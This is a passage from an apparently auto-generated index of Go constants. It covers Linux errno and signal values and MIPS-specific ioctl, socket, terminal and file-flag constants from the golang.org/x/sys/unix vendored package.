(line 621) | ESOCKTNOSUPPORT = syscall.Errno(0x5e) constant ESRMNT (line 622) | ESRMNT = syscall.Errno(0x45) constant ESTALE (line 623) | ESTALE = syscall.Errno(0x74) constant ESTRPIPE (line 624) | ESTRPIPE = syscall.Errno(0x56) constant ETIME (line 625) | ETIME = syscall.Errno(0x3e) constant ETIMEDOUT (line 626) | ETIMEDOUT = syscall.Errno(0x6e) constant ETOOMANYREFS (line 627) | ETOOMANYREFS = syscall.Errno(0x6d) constant EUCLEAN (line 628) | EUCLEAN = syscall.Errno(0x75) constant EUNATCH (line 629) | EUNATCH = syscall.Errno(0x31) constant EUSERS (line 630) | EUSERS = syscall.Errno(0x57) constant EXFULL (line 631) | EXFULL = syscall.Errno(0x36) constant SIGBUS (line 636) | SIGBUS = syscall.Signal(0x7) constant SIGCHLD (line 637) | SIGCHLD = syscall.Signal(0x11) constant SIGCLD (line 638) | SIGCLD = syscall.Signal(0x11) constant SIGCONT (line 639) | SIGCONT = syscall.Signal(0x12) constant SIGIO (line 640) | SIGIO = syscall.Signal(0x1d) constant SIGPOLL (line 641) | SIGPOLL = syscall.Signal(0x1d) constant SIGPROF (line 642) | SIGPROF = syscall.Signal(0x1b) constant SIGPWR (line 643) | SIGPWR = syscall.Signal(0x1e) constant SIGSTKFLT (line 644) | SIGSTKFLT = syscall.Signal(0x10) constant SIGSTOP (line 645) | SIGSTOP = syscall.Signal(0x13) constant SIGSYS (line 646) | SIGSYS = syscall.Signal(0x1f) constant SIGTSTP (line 647) | SIGTSTP = syscall.Signal(0x14) constant SIGTTIN (line 648) | SIGTTIN = syscall.Signal(0x15) constant SIGTTOU (line 649) | SIGTTOU = syscall.Signal(0x16) constant SIGURG (line 650) | SIGURG = syscall.Signal(0x17) constant SIGUSR1 (line 651) | SIGUSR1 = syscall.Signal(0xa) constant SIGUSR2 (line 652) | SIGUSR2 = syscall.Signal(0xc) constant SIGVTALRM (line 653) | SIGVTALRM = syscall.Signal(0x1a) constant SIGWINCH (line 654) | SIGWINCH = syscall.Signal(0x1c) constant SIGXCPU (line 655) | SIGXCPU = syscall.Signal(0x18) constant SIGXFSZ (line 656) | SIGXFSZ = syscall.Signal(0x19) FILE: vendor/golang.org/x/sys/unix/zerrors_linux_mips.go constant B1000000 (line 14) | B1000000 = 0x1008 constant B115200 (line 15) | B115200 = 0x1002 constant B1152000 (line 16) | B1152000 = 0x1009 constant B1500000 (line 17) | B1500000 = 0x100a constant B2000000 (line 18) | B2000000 = 0x100b constant B230400 (line 19) | B230400 = 0x1003 constant B2500000 (line 20) | B2500000 = 0x100c constant B3000000 (line 21) | B3000000 = 0x100d constant B3500000 (line 22) | B3500000 = 0x100e constant B4000000 (line 23) | B4000000 = 0x100f constant B460800 (line 24) | B460800 = 0x1004 constant B500000 (line 25) | B500000 = 0x1005 constant B57600 (line 26) | B57600 = 0x1001 constant B576000 (line 27) | B576000 = 0x1006 constant B921600 (line 28) | B921600 = 0x1007 constant BLKALIGNOFF (line 29) | BLKALIGNOFF = 0x2000127a constant BLKBSZGET (line 30) | BLKBSZGET = 0x40041270 constant BLKBSZSET (line 31) | BLKBSZSET = 0x80041271 constant BLKDISCARD (line 32) | BLKDISCARD = 0x20001277 constant BLKDISCARDZEROES (line 33) | BLKDISCARDZEROES = 0x2000127c constant BLKFLSBUF (line 34) | BLKFLSBUF = 0x20001261 constant BLKFRAGET (line 35) | BLKFRAGET = 0x20001265 constant BLKFRASET (line 36) | BLKFRASET = 0x20001264 constant BLKGETDISKSEQ (line 37) | BLKGETDISKSEQ = 0x40081280 constant BLKGETSIZE (line 38) | BLKGETSIZE = 0x20001260 constant BLKGETSIZE64 (line 39) | BLKGETSIZE64 = 0x40041272 constant BLKIOMIN (line 40) | BLKIOMIN = 0x20001278 constant BLKIOOPT (line 41) | BLKIOOPT = 0x20001279 constant BLKPBSZGET (line 42) | BLKPBSZGET = 0x2000127b constant BLKRAGET (line 43) | BLKRAGET = 0x20001263 constant BLKRASET (line 44) | BLKRASET = 0x20001262 constant BLKROGET (line 45) | BLKROGET = 0x2000125e constant BLKROSET (line 46) | BLKROSET = 0x2000125d constant BLKROTATIONAL (line 47) | BLKROTATIONAL = 0x2000127e constant BLKRRPART (line 48) | BLKRRPART = 0x2000125f constant BLKSECDISCARD (line 49) | BLKSECDISCARD = 0x2000127d constant BLKSECTGET (line 50) | BLKSECTGET = 0x20001267 constant BLKSECTSET (line 51) | BLKSECTSET = 0x20001266 constant BLKSSZGET (line 52) | BLKSSZGET = 0x20001268 constant BLKZEROOUT (line 53) | BLKZEROOUT = 0x2000127f constant BOTHER (line 54) | BOTHER = 0x1000 constant BS1 (line 55) | BS1 = 0x2000 constant BSDLY (line 56) | BSDLY = 0x2000 constant CBAUD (line 57) | CBAUD = 0x100f constant CBAUDEX (line 58) | CBAUDEX = 0x1000 constant CIBAUD (line 59) | CIBAUD = 0x100f0000 constant CLOCAL (line 60) | CLOCAL = 0x800 constant CR1 (line 61) | CR1 = 0x200 constant CR2 (line 62) | CR2 = 0x400 constant CR3 (line 63) | CR3 = 0x600 constant CRDLY (line 64) | CRDLY = 0x600 constant CREAD (line 65) | CREAD = 0x80 constant CS6 (line 66) | CS6 = 0x10 constant CS7 (line 67) | CS7 = 0x20 constant CS8 (line 68) | CS8 = 0x30 constant CSIZE (line 69) | CSIZE = 0x30 constant CSTOPB (line 70) | CSTOPB = 0x40 constant ECCGETLAYOUT (line 71) | ECCGETLAYOUT = 0x41484d11 constant ECCGETSTATS (line 72) | ECCGETSTATS = 0x40104d12 constant ECHOCTL (line 73) | ECHOCTL = 0x200 constant ECHOE (line 74) | ECHOE = 0x10 constant ECHOK (line 75) | ECHOK = 0x20 constant ECHOKE (line 76) | ECHOKE = 0x800 constant ECHONL (line 77) | ECHONL = 0x40 constant ECHOPRT (line 78) | ECHOPRT = 0x400 constant EFD_CLOEXEC (line 79) | EFD_CLOEXEC = 0x80000 constant EFD_NONBLOCK (line 80) | EFD_NONBLOCK = 0x80 constant EPOLL_CLOEXEC (line 81) | EPOLL_CLOEXEC = 0x80000 constant EXTPROC (line 82) | EXTPROC = 0x10000 constant FF1 (line 83) | FF1 = 0x8000 constant FFDLY (line 84) | FFDLY = 0x8000 constant FICLONE (line 85) | FICLONE = 0x80049409 constant FICLONERANGE (line 86) | FICLONERANGE = 0x8020940d constant FLUSHO (line 87) | FLUSHO = 0x2000 constant FS_IOC_ENABLE_VERITY (line 88) | FS_IOC_ENABLE_VERITY = 0x80806685 constant FS_IOC_GETFLAGS (line 89) | FS_IOC_GETFLAGS = 0x40046601 constant FS_IOC_GET_ENCRYPTION_NONCE (line 90) | FS_IOC_GET_ENCRYPTION_NONCE = 0x4010661b constant FS_IOC_GET_ENCRYPTION_POLICY (line 91) | FS_IOC_GET_ENCRYPTION_POLICY = 0x800c6615 constant FS_IOC_GET_ENCRYPTION_PWSALT (line 92) | FS_IOC_GET_ENCRYPTION_PWSALT = 0x80106614 constant FS_IOC_SETFLAGS (line 93) | FS_IOC_SETFLAGS = 0x80046602 constant FS_IOC_SET_ENCRYPTION_POLICY (line 94) | FS_IOC_SET_ENCRYPTION_POLICY = 0x400c6613 constant F_GETLK (line 95) | F_GETLK = 0x21 constant F_GETLK64 (line 96) | F_GETLK64 = 0x21 constant F_GETOWN (line 97) | F_GETOWN = 0x17 constant F_RDLCK (line 98) | F_RDLCK = 0x0 constant F_SETLK (line 99) | F_SETLK = 0x22 constant F_SETLK64 (line 100) | F_SETLK64 = 0x22 constant F_SETLKW (line 101) | F_SETLKW = 0x23 constant F_SETLKW64 (line 102) | F_SETLKW64 = 0x23 constant F_SETOWN (line 103) | F_SETOWN = 0x18 constant F_UNLCK (line 104) | F_UNLCK = 0x2 constant F_WRLCK (line 105) | F_WRLCK = 0x1 constant HIDIOCGRAWINFO (line 106) | HIDIOCGRAWINFO = 0x40084803 constant HIDIOCGRDESC (line 107) | HIDIOCGRDESC = 0x50044802 constant HIDIOCGRDESCSIZE (line 108) | HIDIOCGRDESCSIZE = 0x40044801 constant HUPCL (line 109) | HUPCL = 0x400 constant ICANON (line 110) | ICANON = 0x2 constant IEXTEN (line 111) | IEXTEN = 0x100 constant IN_CLOEXEC (line 112) | IN_CLOEXEC = 0x80000 constant IN_NONBLOCK (line 113) | IN_NONBLOCK = 0x80 constant IOCTL_VM_SOCKETS_GET_LOCAL_CID (line 114) | IOCTL_VM_SOCKETS_GET_LOCAL_CID = 0x200007b9 constant ISIG (line 115) | ISIG = 0x1 constant IUCLC (line 116) | IUCLC = 0x200 constant IXOFF (line 117) | IXOFF = 0x1000 constant IXON (line 118) | IXON = 0x400 constant MAP_ANON (line 119) | MAP_ANON = 0x800 constant MAP_ANONYMOUS (line 120) | MAP_ANONYMOUS = 0x800 constant MAP_DENYWRITE (line 121) | MAP_DENYWRITE = 0x2000 constant MAP_EXECUTABLE (line 122) | MAP_EXECUTABLE = 0x4000 constant MAP_GROWSDOWN (line 123) | MAP_GROWSDOWN = 0x1000 constant MAP_HUGETLB (line 124) | MAP_HUGETLB = 0x80000 constant MAP_LOCKED (line 125) | MAP_LOCKED = 0x8000 constant MAP_NONBLOCK (line 126) | MAP_NONBLOCK = 0x20000 constant MAP_NORESERVE (line 127) | MAP_NORESERVE = 0x400 constant MAP_POPULATE (line 128) | MAP_POPULATE = 0x10000 constant MAP_RENAME (line 129) | MAP_RENAME = 0x800 constant MAP_STACK (line 130) | MAP_STACK = 0x40000 constant MCL_CURRENT (line 131) | MCL_CURRENT = 0x1 constant MCL_FUTURE (line 132) | MCL_FUTURE = 0x2 constant MCL_ONFAULT (line 133) | MCL_ONFAULT = 0x4 constant MEMERASE (line 134) | MEMERASE = 0x80084d02 constant MEMERASE64 (line 135) | MEMERASE64 = 0x80104d14 constant MEMGETBADBLOCK (line 136) | MEMGETBADBLOCK = 0x80084d0b constant MEMGETINFO (line 137) | MEMGETINFO = 0x40204d01 constant MEMGETOOBSEL (line 138) | MEMGETOOBSEL = 0x40c84d0a constant MEMGETREGIONCOUNT (line 139) | MEMGETREGIONCOUNT = 0x40044d07 constant MEMISLOCKED (line 140) | MEMISLOCKED = 0x40084d17 constant MEMLOCK (line 141) | MEMLOCK = 0x80084d05 constant MEMREAD (line 142) | MEMREAD = 0xc0404d1a constant MEMREADOOB (line 143) | MEMREADOOB = 0xc00c4d04 constant MEMSETBADBLOCK (line 144) | MEMSETBADBLOCK = 0x80084d0c constant MEMUNLOCK (line 145) | MEMUNLOCK = 0x80084d06 constant MEMWRITEOOB (line 146) | MEMWRITEOOB = 0xc00c4d03 constant MTDFILEMODE (line 147) | MTDFILEMODE = 0x20004d13 constant NFDBITS (line 148) | NFDBITS = 0x20 constant NLDLY (line 149) | NLDLY = 0x100 constant NOFLSH (line 150) | NOFLSH = 0x80 constant NS_GET_NSTYPE (line 151) | NS_GET_NSTYPE = 0x2000b703 constant NS_GET_OWNER_UID (line 152) | NS_GET_OWNER_UID = 0x2000b704 constant NS_GET_PARENT (line 153) | NS_GET_PARENT = 0x2000b702 constant NS_GET_USERNS (line 154) | NS_GET_USERNS = 0x2000b701 constant OLCUC (line 155) | OLCUC = 0x2 constant ONLCR (line 156) | ONLCR = 0x4 constant OTPERASE (line 157) | OTPERASE = 0x800c4d19 constant OTPGETREGIONCOUNT (line 158) | OTPGETREGIONCOUNT = 0x80044d0e constant OTPGETREGIONINFO (line 159) | OTPGETREGIONINFO = 0x800c4d0f constant OTPLOCK (line 160) | OTPLOCK = 0x400c4d10 constant OTPSELECT (line 161) | OTPSELECT = 0x40044d0d constant O_APPEND (line 162) | O_APPEND = 0x8 constant O_ASYNC (line 163) | O_ASYNC = 0x1000 constant O_CLOEXEC (line 164) | O_CLOEXEC = 0x80000 constant O_CREAT (line 165) | O_CREAT = 0x100 constant O_DIRECT (line 166) | O_DIRECT = 0x8000 constant O_DIRECTORY (line 167) | O_DIRECTORY = 0x10000 constant O_DSYNC (line 168) | O_DSYNC = 0x10 constant O_EXCL (line 169) | O_EXCL = 0x400 constant O_FSYNC (line 170) | O_FSYNC = 0x4010 constant O_LARGEFILE (line 171) | O_LARGEFILE = 0x2000 constant O_NDELAY (line 172) | O_NDELAY = 0x80 constant O_NOATIME (line 173) | O_NOATIME = 0x40000 constant O_NOCTTY (line 174) | O_NOCTTY = 0x800 constant O_NOFOLLOW (line 175) | O_NOFOLLOW = 0x20000 constant O_NONBLOCK (line 176) | O_NONBLOCK = 0x80 constant O_PATH (line 177) | O_PATH = 0x200000 constant O_RSYNC (line 178) | O_RSYNC = 0x4010 constant O_SYNC (line 179) | O_SYNC = 0x4010 constant O_TMPFILE (line 180) | O_TMPFILE = 0x410000 constant O_TRUNC (line 181) | O_TRUNC = 0x200 constant PARENB (line 182) | PARENB = 0x100 constant PARODD (line 183) | PARODD = 0x200 constant PENDIN (line 184) | PENDIN = 0x4000 constant PERF_EVENT_IOC_DISABLE (line 185) | PERF_EVENT_IOC_DISABLE = 0x20002401 constant PERF_EVENT_IOC_ENABLE (line 186) | PERF_EVENT_IOC_ENABLE = 0x20002400 constant PERF_EVENT_IOC_ID (line 187) | PERF_EVENT_IOC_ID = 0x40042407 constant PERF_EVENT_IOC_MODIFY_ATTRIBUTES (line 188) | PERF_EVENT_IOC_MODIFY_ATTRIBUTES = 0x8004240b constant PERF_EVENT_IOC_PAUSE_OUTPUT (line 189) | PERF_EVENT_IOC_PAUSE_OUTPUT = 0x80042409 constant PERF_EVENT_IOC_PERIOD (line 190) | PERF_EVENT_IOC_PERIOD = 0x80082404 constant PERF_EVENT_IOC_QUERY_BPF (line 191) | PERF_EVENT_IOC_QUERY_BPF = 0xc004240a constant PERF_EVENT_IOC_REFRESH (line 192) | PERF_EVENT_IOC_REFRESH = 0x20002402 constant PERF_EVENT_IOC_RESET (line 193) | PERF_EVENT_IOC_RESET = 0x20002403 constant PERF_EVENT_IOC_SET_BPF (line 194) | PERF_EVENT_IOC_SET_BPF = 0x80042408 constant PERF_EVENT_IOC_SET_FILTER (line 195) | PERF_EVENT_IOC_SET_FILTER = 0x80042406 constant PERF_EVENT_IOC_SET_OUTPUT (line 196) | PERF_EVENT_IOC_SET_OUTPUT = 0x20002405 constant PPPIOCATTACH (line 197) | PPPIOCATTACH = 0x8004743d constant PPPIOCATTCHAN (line 198) | PPPIOCATTCHAN = 0x80047438 constant PPPIOCBRIDGECHAN (line 199) | PPPIOCBRIDGECHAN = 0x80047435 constant PPPIOCCONNECT (line 200) | PPPIOCCONNECT = 0x8004743a constant PPPIOCDETACH (line 201) | PPPIOCDETACH = 0x8004743c constant PPPIOCDISCONN (line 202) | PPPIOCDISCONN = 0x20007439 constant PPPIOCGASYNCMAP (line 203) | PPPIOCGASYNCMAP = 0x40047458 constant PPPIOCGCHAN (line 204) | PPPIOCGCHAN = 0x40047437 constant PPPIOCGDEBUG (line 205) | PPPIOCGDEBUG = 0x40047441 constant PPPIOCGFLAGS (line 206) | PPPIOCGFLAGS = 0x4004745a constant PPPIOCGIDLE (line 207) | PPPIOCGIDLE = 0x4008743f constant PPPIOCGIDLE32 (line 208) | PPPIOCGIDLE32 = 0x4008743f constant PPPIOCGIDLE64 (line 209) | PPPIOCGIDLE64 = 0x4010743f constant PPPIOCGL2TPSTATS (line 210) | PPPIOCGL2TPSTATS = 0x40487436 constant PPPIOCGMRU (line 211) | PPPIOCGMRU = 0x40047453 constant PPPIOCGRASYNCMAP (line 212) | PPPIOCGRASYNCMAP = 0x40047455 constant PPPIOCGUNIT (line 213) | PPPIOCGUNIT = 0x40047456 constant PPPIOCGXASYNCMAP (line 214) | PPPIOCGXASYNCMAP = 0x40207450 constant PPPIOCSACTIVE (line 215) | PPPIOCSACTIVE = 0x80087446 constant PPPIOCSASYNCMAP (line 216) | PPPIOCSASYNCMAP = 0x80047457 constant PPPIOCSCOMPRESS (line 217) | PPPIOCSCOMPRESS = 0x800c744d constant PPPIOCSDEBUG (line 218) | PPPIOCSDEBUG = 0x80047440 constant PPPIOCSFLAGS (line 219) | PPPIOCSFLAGS = 0x80047459 constant PPPIOCSMAXCID (line 220) | PPPIOCSMAXCID = 0x80047451 constant PPPIOCSMRRU (line 221) | PPPIOCSMRRU = 0x8004743b constant PPPIOCSMRU (line 222) | PPPIOCSMRU = 0x80047452 constant PPPIOCSNPMODE (line 223) | PPPIOCSNPMODE = 0x8008744b constant PPPIOCSPASS (line 224) | PPPIOCSPASS = 0x80087447 constant PPPIOCSRASYNCMAP (line 225) | PPPIOCSRASYNCMAP = 0x80047454 constant PPPIOCSXASYNCMAP (line 226) | PPPIOCSXASYNCMAP = 0x8020744f constant PPPIOCUNBRIDGECHAN (line 227) | PPPIOCUNBRIDGECHAN = 0x20007434 constant PPPIOCXFERUNIT (line 228) | PPPIOCXFERUNIT = 0x2000744e constant PR_SET_PTRACER_ANY (line 229) | PR_SET_PTRACER_ANY = 0xffffffff constant PTRACE_GETFPREGS (line 230) | PTRACE_GETFPREGS = 0xe constant PTRACE_GET_THREAD_AREA (line 231) | PTRACE_GET_THREAD_AREA = 0x19 constant PTRACE_GET_THREAD_AREA_3264 (line 232) | PTRACE_GET_THREAD_AREA_3264 = 0xc4 constant PTRACE_GET_WATCH_REGS (line 233) | PTRACE_GET_WATCH_REGS = 0xd0 constant PTRACE_OLDSETOPTIONS (line 234) | PTRACE_OLDSETOPTIONS = 0x15 constant PTRACE_PEEKDATA_3264 (line 235) | PTRACE_PEEKDATA_3264 = 0xc1 constant PTRACE_PEEKTEXT_3264 (line 236) | PTRACE_PEEKTEXT_3264 = 0xc0 constant PTRACE_POKEDATA_3264 (line 237) | PTRACE_POKEDATA_3264 = 0xc3 constant PTRACE_POKETEXT_3264 (line 238) | PTRACE_POKETEXT_3264 = 0xc2 constant PTRACE_SETFPREGS (line 239) | PTRACE_SETFPREGS = 0xf constant PTRACE_SET_THREAD_AREA (line 240) | PTRACE_SET_THREAD_AREA = 0x1a constant PTRACE_SET_WATCH_REGS (line 241) | PTRACE_SET_WATCH_REGS = 0xd1 constant RLIMIT_AS (line 242) | RLIMIT_AS = 0x6 constant RLIMIT_MEMLOCK (line 243) | RLIMIT_MEMLOCK = 0x9 constant RLIMIT_NOFILE (line 244) | RLIMIT_NOFILE = 0x5 constant RLIMIT_NPROC (line 245) | RLIMIT_NPROC = 0x8 constant RLIMIT_RSS (line 246) | RLIMIT_RSS = 0x7 constant RNDADDENTROPY (line 247) | RNDADDENTROPY = 0x80085203 constant RNDADDTOENTCNT (line 248) | RNDADDTOENTCNT = 0x80045201 constant RNDCLEARPOOL (line 249) | RNDCLEARPOOL = 0x20005206 constant RNDGETENTCNT (line 250) | RNDGETENTCNT = 0x40045200 constant RNDGETPOOL (line 251) | RNDGETPOOL = 0x40085202 constant RNDRESEEDCRNG (line 252) | RNDRESEEDCRNG = 0x20005207 constant RNDZAPENTCNT (line 253) | RNDZAPENTCNT = 0x20005204 constant RTC_AIE_OFF (line 254) | RTC_AIE_OFF = 0x20007002 constant RTC_AIE_ON (line 255) | RTC_AIE_ON = 0x20007001 constant RTC_ALM_READ (line 256) | RTC_ALM_READ = 0x40247008 constant RTC_ALM_SET (line 257) | RTC_ALM_SET = 0x80247007 constant RTC_EPOCH_READ (line 258) | RTC_EPOCH_READ = 0x4004700d constant RTC_EPOCH_SET (line 259) | RTC_EPOCH_SET = 0x8004700e constant RTC_IRQP_READ (line 260) | RTC_IRQP_READ = 0x4004700b constant RTC_IRQP_SET (line 261) | RTC_IRQP_SET = 0x8004700c constant RTC_PARAM_GET (line 262) | RTC_PARAM_GET = 0x80187013 constant RTC_PARAM_SET (line 263) | RTC_PARAM_SET = 0x80187014 constant RTC_PIE_OFF (line 264) | RTC_PIE_OFF = 0x20007006 constant RTC_PIE_ON (line 265) | RTC_PIE_ON = 0x20007005 constant RTC_PLL_GET (line 266) | RTC_PLL_GET = 0x401c7011 constant RTC_PLL_SET (line 267) | RTC_PLL_SET = 0x801c7012 constant RTC_RD_TIME (line 268) | RTC_RD_TIME = 0x40247009 constant RTC_SET_TIME (line 269) | RTC_SET_TIME = 0x8024700a constant RTC_UIE_OFF (line 270) | RTC_UIE_OFF = 0x20007004 constant RTC_UIE_ON (line 271) | RTC_UIE_ON = 0x20007003 constant RTC_VL_CLR (line 272) | RTC_VL_CLR = 0x20007014 constant RTC_VL_READ (line 273) | RTC_VL_READ = 0x40047013 constant RTC_WIE_OFF (line 274) | RTC_WIE_OFF = 0x20007010 constant RTC_WIE_ON (line 275) | RTC_WIE_ON = 0x2000700f constant RTC_WKALM_RD (line 276) | RTC_WKALM_RD = 0x40287010 constant RTC_WKALM_SET (line 277) | RTC_WKALM_SET = 0x8028700f constant SCM_TIMESTAMPING (line 278) | SCM_TIMESTAMPING = 0x25 constant SCM_TIMESTAMPING_OPT_STATS (line 279) | SCM_TIMESTAMPING_OPT_STATS = 0x36 constant SCM_TIMESTAMPING_PKTINFO (line 280) | SCM_TIMESTAMPING_PKTINFO = 0x3a constant SCM_TIMESTAMPNS (line 281) | SCM_TIMESTAMPNS = 0x23 constant SCM_TXTIME (line 282) | SCM_TXTIME = 0x3d constant SCM_WIFI_STATUS (line 283) | SCM_WIFI_STATUS = 0x29 constant SECCOMP_IOCTL_NOTIF_ADDFD (line 284) | SECCOMP_IOCTL_NOTIF_ADDFD = 0x80182103 constant SECCOMP_IOCTL_NOTIF_ID_VALID (line 285) | SECCOMP_IOCTL_NOTIF_ID_VALID = 0x80082102 constant SECCOMP_IOCTL_NOTIF_SET_FLAGS (line 286) | SECCOMP_IOCTL_NOTIF_SET_FLAGS = 0x80082104 constant SFD_CLOEXEC (line 287) | SFD_CLOEXEC = 0x80000 constant SFD_NONBLOCK (line 288) | SFD_NONBLOCK = 0x80 constant SIOCATMARK (line 289) | SIOCATMARK = 0x40047307 constant SIOCGPGRP (line 290) | SIOCGPGRP = 0x40047309 constant SIOCGSTAMPNS_NEW (line 291) | SIOCGSTAMPNS_NEW = 0x40108907 constant SIOCGSTAMP_NEW (line 292) | SIOCGSTAMP_NEW = 0x40108906 constant SIOCINQ (line 293) | SIOCINQ = 0x467f constant SIOCOUTQ (line 294) | SIOCOUTQ = 0x7472 constant SIOCSPGRP (line 295) | SIOCSPGRP = 0x80047308 constant SOCK_CLOEXEC (line 296) | SOCK_CLOEXEC = 0x80000 constant SOCK_DGRAM (line 297) | SOCK_DGRAM = 0x1 constant SOCK_NONBLOCK (line 298) | SOCK_NONBLOCK = 0x80 constant SOCK_STREAM (line 299) | SOCK_STREAM = 0x2 constant SOL_SOCKET (line 300) | SOL_SOCKET = 0xffff constant SO_ACCEPTCONN (line 301) | SO_ACCEPTCONN = 0x1009 constant SO_ATTACH_BPF (line 302) | SO_ATTACH_BPF = 0x32 constant SO_ATTACH_REUSEPORT_CBPF (line 303) | SO_ATTACH_REUSEPORT_CBPF = 0x33 constant SO_ATTACH_REUSEPORT_EBPF (line 304) | SO_ATTACH_REUSEPORT_EBPF = 0x34 constant SO_BINDTODEVICE (line 305) | SO_BINDTODEVICE = 0x19 constant SO_BINDTOIFINDEX (line 306) | SO_BINDTOIFINDEX = 0x3e constant SO_BPF_EXTENSIONS (line 307) | SO_BPF_EXTENSIONS = 0x30 constant SO_BROADCAST (line 308) | SO_BROADCAST = 0x20 constant SO_BSDCOMPAT (line 309) | SO_BSDCOMPAT = 0xe constant SO_BUF_LOCK (line 310) | SO_BUF_LOCK = 0x48 constant SO_BUSY_POLL (line 311) | SO_BUSY_POLL = 0x2e constant SO_BUSY_POLL_BUDGET (line 312) | SO_BUSY_POLL_BUDGET = 0x46 constant SO_CNX_ADVICE (line 313) | SO_CNX_ADVICE = 0x35 constant SO_COOKIE (line 314) | SO_COOKIE = 0x39 constant SO_DETACH_REUSEPORT_BPF (line 315) | SO_DETACH_REUSEPORT_BPF = 0x44 constant SO_DOMAIN (line 316) | SO_DOMAIN = 0x1029 constant SO_DONTROUTE (line 317) | SO_DONTROUTE = 0x10 constant SO_ERROR (line 318) | SO_ERROR = 0x1007 constant SO_INCOMING_CPU (line 319) | SO_INCOMING_CPU = 0x31 constant SO_INCOMING_NAPI_ID (line 320) | SO_INCOMING_NAPI_ID = 0x38 constant SO_KEEPALIVE (line 321) | SO_KEEPALIVE = 0x8 constant SO_LINGER (line 322) | SO_LINGER = 0x80 constant SO_LOCK_FILTER (line 323) | SO_LOCK_FILTER = 0x2c constant SO_MARK (line 324) | SO_MARK = 0x24 constant SO_MAX_PACING_RATE (line 325) | SO_MAX_PACING_RATE = 0x2f constant SO_MEMINFO (line 326) | SO_MEMINFO = 0x37 constant SO_NETNS_COOKIE (line 327) | SO_NETNS_COOKIE = 0x47 constant SO_NOFCS (line 328) | SO_NOFCS = 0x2b constant SO_OOBINLINE (line 329) | SO_OOBINLINE = 0x100 constant SO_PASSCRED (line 330) | SO_PASSCRED = 0x11 constant SO_PASSPIDFD (line 331) | SO_PASSPIDFD = 0x4c constant SO_PASSSEC (line 332) | SO_PASSSEC = 0x22 constant SO_PEEK_OFF (line 333) | SO_PEEK_OFF = 0x2a constant SO_PEERCRED (line 334) | SO_PEERCRED = 0x12 constant SO_PEERGROUPS (line 335) | SO_PEERGROUPS = 0x3b constant SO_PEERPIDFD (line 336) | SO_PEERPIDFD = 0x4d constant SO_PEERSEC (line 337) | SO_PEERSEC = 0x1e constant SO_PREFER_BUSY_POLL (line 338) | SO_PREFER_BUSY_POLL = 0x45 constant SO_PROTOCOL (line 339) | SO_PROTOCOL = 0x1028 constant SO_RCVBUF (line 340) | SO_RCVBUF = 0x1002 constant SO_RCVBUFFORCE (line 341) | SO_RCVBUFFORCE = 0x21 constant SO_RCVLOWAT (line 342) | SO_RCVLOWAT = 0x1004 constant SO_RCVMARK (line 343) | SO_RCVMARK = 0x4b constant SO_RCVTIMEO (line 344) | SO_RCVTIMEO = 0x1006 constant SO_RCVTIMEO_NEW (line 345) | SO_RCVTIMEO_NEW = 0x42 constant SO_RCVTIMEO_OLD (line 346) | SO_RCVTIMEO_OLD = 0x1006 constant SO_RESERVE_MEM (line 347) | SO_RESERVE_MEM = 0x49 constant SO_REUSEADDR (line 348) | SO_REUSEADDR = 0x4 constant SO_REUSEPORT (line 349) | SO_REUSEPORT = 0x200 constant SO_RXQ_OVFL (line 350) | SO_RXQ_OVFL = 0x28 constant SO_SECURITY_AUTHENTICATION (line 351) | SO_SECURITY_AUTHENTICATION = 0x16 constant SO_SECURITY_ENCRYPTION_NETWORK (line 352) | SO_SECURITY_ENCRYPTION_NETWORK = 0x18 constant SO_SECURITY_ENCRYPTION_TRANSPORT (line 353) | SO_SECURITY_ENCRYPTION_TRANSPORT = 0x17 constant SO_SELECT_ERR_QUEUE (line 354) | SO_SELECT_ERR_QUEUE = 0x2d constant SO_SNDBUF (line 355) | SO_SNDBUF = 0x1001 constant SO_SNDBUFFORCE (line 356) | SO_SNDBUFFORCE = 0x1f constant SO_SNDLOWAT (line 357) | SO_SNDLOWAT = 0x1003 constant SO_SNDTIMEO (line 358) | SO_SNDTIMEO = 0x1005 constant SO_SNDTIMEO_NEW (line 359) | SO_SNDTIMEO_NEW = 0x43 constant SO_SNDTIMEO_OLD (line 360) | SO_SNDTIMEO_OLD = 0x1005 constant SO_STYLE (line 361) | SO_STYLE = 0x1008 constant SO_TIMESTAMPING (line 362) | SO_TIMESTAMPING = 0x25 constant SO_TIMESTAMPING_NEW (line 363) | SO_TIMESTAMPING_NEW = 0x41 constant SO_TIMESTAMPING_OLD (line 364) | SO_TIMESTAMPING_OLD = 0x25 constant SO_TIMESTAMPNS (line 365) | SO_TIMESTAMPNS = 0x23 constant SO_TIMESTAMPNS_NEW (line 366) | SO_TIMESTAMPNS_NEW = 0x40 constant SO_TIMESTAMPNS_OLD (line 367) | SO_TIMESTAMPNS_OLD = 0x23 constant SO_TIMESTAMP_NEW (line 368) | SO_TIMESTAMP_NEW = 0x3f constant SO_TXREHASH (line 369) | SO_TXREHASH = 0x4a constant SO_TXTIME (line 370) | SO_TXTIME = 0x3d constant SO_TYPE (line 371) | SO_TYPE = 0x1008 constant SO_WIFI_STATUS (line 372) | SO_WIFI_STATUS = 0x29 constant SO_ZEROCOPY (line 373) | SO_ZEROCOPY = 0x3c constant TAB1 (line 374) | TAB1 = 0x800 constant TAB2 (line 375) | TAB2 = 0x1000 constant TAB3 (line 376) | TAB3 = 0x1800 constant TABDLY (line 377) | TABDLY = 0x1800 constant TCFLSH (line 378) | TCFLSH = 0x5407 constant TCGETA (line 379) | TCGETA = 0x5401 constant TCGETS (line 380) | TCGETS = 0x540d constant TCGETS2 (line 381) | TCGETS2 = 0x4030542a constant TCSAFLUSH (line 382) | TCSAFLUSH = 0x5410 constant TCSBRK (line 383) | TCSBRK = 0x5405 constant TCSBRKP (line 384) | TCSBRKP = 0x5486 constant TCSETA (line 385) | TCSETA = 0x5402 constant TCSETAF (line 386) | TCSETAF = 0x5404 constant TCSETAW (line 387) | TCSETAW = 0x5403 constant TCSETS (line 388) | TCSETS = 0x540e constant TCSETS2 (line 389) | TCSETS2 = 0x8030542b constant TCSETSF (line 390) | TCSETSF = 0x5410 constant TCSETSF2 (line 391) | TCSETSF2 = 0x8030542d constant TCSETSW (line 392) | TCSETSW = 0x540f constant TCSETSW2 (line 393) | TCSETSW2 = 0x8030542c constant TCXONC (line 394) | TCXONC = 0x5406 constant TFD_CLOEXEC (line 395) | TFD_CLOEXEC = 0x80000 constant TFD_NONBLOCK (line 396) | TFD_NONBLOCK = 0x80 constant TIOCCBRK (line 397) | TIOCCBRK = 0x5428 constant TIOCCONS (line 398) | TIOCCONS = 0x80047478 constant TIOCEXCL (line 399) | TIOCEXCL = 0x740d constant TIOCGDEV (line 400) | TIOCGDEV = 0x40045432 constant 